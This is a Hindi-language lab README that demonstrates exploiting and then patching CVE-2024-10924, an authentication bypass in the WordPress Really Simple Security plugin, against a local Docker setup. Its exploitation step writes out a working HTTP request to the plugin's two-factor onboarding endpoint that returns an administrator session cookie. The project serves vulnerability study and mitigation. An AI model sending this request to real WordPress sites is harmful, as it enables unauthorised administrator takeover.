
WordPress Really Simple Security में CVE-2024-10924, एक प्रमाणीकरण बाईपास, के शोषण और शमन को प्रदर्शित करता है, स्वचालित Python शोषण, मैनुअल Burp Suite चरणों और पैच सत्यापन के साथ।
CVE-2024-10924 - Really Simple Security में प्रमाणीकरण उपेक्षा
अवलोकन यह परियोजना CVE-2024-10924 के शोषण और शमन को प्रदर्शित करती है, जो WordPress "Really Simple Security" प्लगइन में एक गंभीर प्रमाणीकरण उपेक्षा भेद्यता है।
चरण 1: पर्यावरण सेटअप
भेद्य WordPress वातावरण प्रारंभ करें: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
कंटेनर चल रहे हैं यह सत्यापित करें: docker ps
WordPress एक्सेस करें: http://localhost:1337
आवश्यक उपकरण:
चरण 2: भेद्यता स्कैन
लक्ष्य के विरुद्ध GVM स्कैन चलाएँ:
चरण 3: शोषण
विधि A - स्वचालित Python शोषण: python exploit.py
विधि B - मैन्युअल Burp Suite:
http://localhost:1337 पर ट्रैफ़िक इंटरसेप्ट करें
POST अनुरोध भेजें: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
एडमिन सत्र वाले Set-Cookie हेडर के साथ प्रतिक्रिया देखें
अपेक्षित परिणाम:
चरण 4: शमन
भेद्य एंडपॉइंट को अवरुद्ध करने के लिए पैच लागू करें: .\patch.ps1
यह क्या करता है:
चरण 5: सत्यापन
शोषण पुनः चलाएँ (विधि A या B): python exploit.py
शमन के बाद अपेक्षित परिणाम:
अतिरिक्त नोट्स
पर्यावरण को रोकने के लिए: docker-compose down
कंटेनर लॉग देखने के लिए: docker-compose logs -f
WordPress एडमिन को वैध रूप से एक्सेस करने के लिए: http://localhost:1337/wp-admin (क्रेडेंशियल के लिए docker-compose.yml जाँचें)